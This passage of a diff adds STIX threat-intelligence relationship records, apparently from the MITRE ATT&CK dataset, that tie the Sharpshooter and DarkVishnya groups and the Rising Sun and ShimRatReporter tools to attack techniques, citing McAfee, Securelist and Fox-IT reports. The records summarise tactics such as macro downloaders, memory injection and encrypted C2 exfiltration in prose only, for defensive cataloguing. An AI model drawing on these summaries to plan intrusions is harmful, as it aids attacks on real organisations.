+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Sharpshooter](https://attack.mitre.org/groups/G0104)'s first-stage downloader installed [Rising Sun](https://attack.mitre.org/software/S0448) to the startup folder %Startup%\\mssync.exe.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--e93e6c30-16aa-4f12-856b-19e96bdfdf28",
+ "type": "relationship",
+ "modified": "2020-05-14T21:53:42.091Z",
+ "created": "2020-05-14T21:40:31.188Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Sharpshooter](https://attack.mitre.org/groups/G0104)'s first-stage downloader resolved various Windows libraries and APIs, including LoadLibraryA(), GetProcAddress(), and CreateProcessA().(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--9123ca09-3152-404c-92ed-52982cc043d5",
+ "type": "relationship",
+ "modified": "2020-05-14T21:40:31.201Z",
+ "created": "2020-05-14T21:40:31.201Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Sharpshooter](https://attack.mitre.org/groups/G0104)'s first-stage downloader was a VBA macro.(Citation: McAfee Sharpshooter December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--6571753b-b52d-4a30-b674-426f358253b0",
+ "type": "relationship",
+ "modified": "2020-05-14T21:40:31.204Z",
+ "created": "2020-05-14T21:40:31.204Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Sharpshooter](https://attack.mitre.org/groups/G0104) downloaded additional payloads after a target was infected with a first-stage downloader.(Citation: McAfee Sharpshooter December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--164f3527-8811-4f4a-a561-060d010d78dd",
+ "type": "relationship",
+ "modified": "2020-05-14T21:40:31.207Z",
+ "created": "2020-05-14T21:40:31.207Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Sharpshooter](https://attack.mitre.org/groups/G0104) has leveraged embedded shellcode to inject a downloader into the memory of Word.(Citation: McAfee Sharpshooter December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--aee0bd8a-1900-448b-bd88-5493f9ed8d28",
+ "type": "relationship",
+ "modified": "2020-06-30T03:05:58.589Z",
+ "created": "2020-05-14T21:40:31.248Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Sharpshooter](https://attack.mitre.org/groups/G0104) has sent malicious DOC and PDF files to targets so that they can be opened by a user.(Citation: McAfee Sharpshooter December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--24d5ba1b-dbce-4c25-8180-1ee40b8c827f",
+ "type": "relationship",
+ "modified": "2020-06-30T03:08:45.055Z",
+ "created": "2020-05-14T21:40:31.265Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Sharpshooter](https://attack.mitre.org/groups/G0104) has sent malicious attachments via emails to targets.(Citation: McAfee Sharpshooter December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--b65dc335-2dc2-41ca-8b68-a673a75761a2",
+ "type": "relationship",
+ "modified": "2020-05-14T21:40:31.268Z",
+ "created": "2020-05-14T21:40:31.268Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can clear process memory by overwriting it with junk bytes.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--811ba10b-6fe7-40d9-ab98-70d4135ac7cf",
+ "type": "relationship",
+ "modified": "2020-05-14T22:29:26.002Z",
+ "created": "2020-05-14T22:29:26.002Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can enumerate information about files from the infected system, including file size, attributes, creation time, last access time, and write time. [Rising Sun](https://attack.mitre.org/software/S0448) can enumerate the compilation timestamp of Windows executable files.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--cfaf6b8e-1ee0-40bf-8a60-27f9c68d86c5",
+ "type": "relationship",
+ "modified": "2020-06-23T00:42:36.379Z",
+ "created": "2020-05-14T22:29:26.004Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can send data gathered from the infected machine via HTTP POST request to the C2.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--b3aa93e7-534f-4bd7-8df7-ed9dfa8ccccc",
+ "type": "relationship",
+ "modified": "2020-05-14T22:29:26.037Z",
+ "created": "2020-05-14T22:29:26.036Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can enumerate all running processes and process information on an infected machine.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--8a7317fd-fa8f-4c32-8aa5-4ff225116f7e",
+ "type": "relationship",
+ "modified": "2020-05-14T22:29:26.039Z",
+ "created": "2020-05-14T22:29:26.039Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can delete files specified by the C2.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--0449ef6d-2ea2-40a3-9cc9-c07672d6a859",
+ "type": "relationship",
+ "modified": "2020-06-17T04:00:52.371Z",
+ "created": "2020-05-14T22:29:26.041Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) executed commands using cmd.exe.(Citation: McAfee Sharpshooter December 2018) ",
+ "relationship_type": "uses",
+ "id": "relationship--c1a5ba7a-659b-4ac2-90df-f3f74a3a8442",
+ "type": "relationship",
+ "modified": "2020-05-14T22:29:26.043Z",
+ "created": "2020-05-14T22:29:26.043Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can archive data using RC4 encryption and Base64 encoding prior to exfiltration.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--39663ad3-549e-4984-a81b-acce5cb02090",
+ "type": "relationship",
+ "modified": "2020-06-30T03:13:38.643Z",
+ "created": "2020-05-14T22:29:26.045Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can detect the computer name, operating system, and other native system information.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--5bd827b4-cdaf-4d50-acb8-493f32d51acb",
+ "type": "relationship",
+ "modified": "2020-05-14T22:29:26.187Z",
+ "created": "2020-05-14T22:29:26.187Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can detect network adapter and IP address information.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f94c802d-62da-4689-ab35-baf9468e2423",
+ "type": "relationship",
+ "modified": "2020-06-17T15:39:20.110Z",
+ "created": "2020-05-14T22:29:26.189Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) decrypted itself using a single-byte XOR scheme. Additionally, [Rising Sun](https://attack.mitre.org/software/S0448) can decrypt its configuration data at runtime.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--4f89d6c4-29ec-4777-bbc9-b0ea78064c42",
+ "type": "relationship",
+ "modified": "2020-06-23T00:42:36.377Z",
+ "created": "2020-05-14T22:29:26.192Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can detect the username of the infected host.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--2d5c711d-dcd6-4d50-b91f-1fda5311eef5",
+ "type": "relationship",
+ "modified": "2020-06-23T00:42:36.416Z",
+ "created": "2020-05-14T22:29:26.207Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) used dynamic API resolutions to various Windows APIs by leveraging LoadLibrary() and GetProcAddress().(Citation: McAfee Sharpshooter December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--ed3539fa-7ae7-45b0-9f0f-d62460ed07b1",
+ "type": "relationship",
+ "modified": "2020-06-23T00:42:36.380Z",
+ "created": "2020-05-14T22:29:26.210Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "Configuration data used by [Rising Sun](https://attack.mitre.org/software/S0448) is encrypted using RC4.(Citation: McAfee Sharpshooter December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--6bb9972b-cec8-4de0-966e-8fea90b4941c",
+ "type": "relationship",
+ "modified": "2020-06-23T00:42:36.434Z",
+ "created": "2020-05-14T22:29:26.212Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) used Bash Bunny, Raspberry Pi, netbooks or inexpensive laptops to connect to the company\u2019s local network.(Citation: Securelist DarkVishnya Dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--04d1a31c-97c2-4cdd-8fb7-391c984e2fad",
+ "type": "relationship",
+ "modified": "2020-05-15T13:17:57.692Z",
+ "created": "2020-05-15T13:17:57.692Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db",
+ "relationship_type": "uses",
+ "id": "relationship--475fef11-3344-4305-9710-cc41ba8acc0a",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "(Citation: Securelist DarkVishnya Dec 2018) ",
+ "type": "relationship",
+ "modified": "2020-05-15T15:08:55.549Z",
+ "created": "2020-05-15T13:17:57.723Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) scanned the network for public shared folders.(Citation: Securelist DarkVishnya Dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--3a31f8c0-36bf-40b5-90d2-d03c72b2c8d8",
+ "type": "relationship",
+ "modified": "2020-05-15T13:17:57.719Z",
+ "created": "2020-05-15T13:17:57.719Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "tool--96fd6cc4-a693-4118-83ec-619e5352d07d",
+ "relationship_type": "uses",
+ "id": "relationship--29b5ee68-0bb0-4264-a781-ece3014fb3dd",
+ "external_references": [
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "(Citation: Securelist DarkVishnya Dec 2018) ",
+ "type": "relationship",
+ "modified": "2020-05-15T15:08:55.560Z",
+ "created": "2020-05-15T13:17:57.731Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) used LZ compression to compress initial reconnaissance reports before sending to the C2.(Citation: FOX-IT May 2016 Mofang)\t",
+ "relationship_type": "uses",
+ "id": "relationship--70af600c-ca7a-4ea3-8c03-3a166e2d88a7",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.424Z",
+ "created": "2020-05-15T13:41:30.676Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) used the Windows function GetExtendedUdpTable to detect connected UDP endpoints.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--16bea458-8018-4e53-a377-5970747521ab",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.505Z",
+ "created": "2020-05-15T13:41:30.679Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) used several Windows API functions to gather information from the infected system.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--f5ced467-529f-4ce2-9f30-6a4a80565e87",
+ "type": "relationship",
+ "modified": "2020-05-15T13:41:30.707Z",
+ "created": "2020-05-15T13:41:30.707Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18",
